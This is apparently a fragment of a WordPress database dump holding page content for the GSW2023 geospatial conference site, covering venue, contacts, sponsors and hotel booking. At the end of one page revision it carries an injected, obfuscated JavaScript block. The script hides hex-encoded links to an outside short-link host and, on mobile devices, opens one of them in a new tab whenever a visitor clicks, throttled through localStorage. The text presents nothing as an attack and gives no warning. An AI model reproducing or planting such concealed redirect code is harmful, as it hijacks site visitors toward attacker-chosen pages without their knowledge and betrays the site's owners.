main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:33:19','2023-05-24 23:33:19','',3066,'https://gsw2023.com/?p=4572',0,'revision','',0),
(4573,1,'2023-05-24 23:33:35','2023-05-24 23:33:35','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button 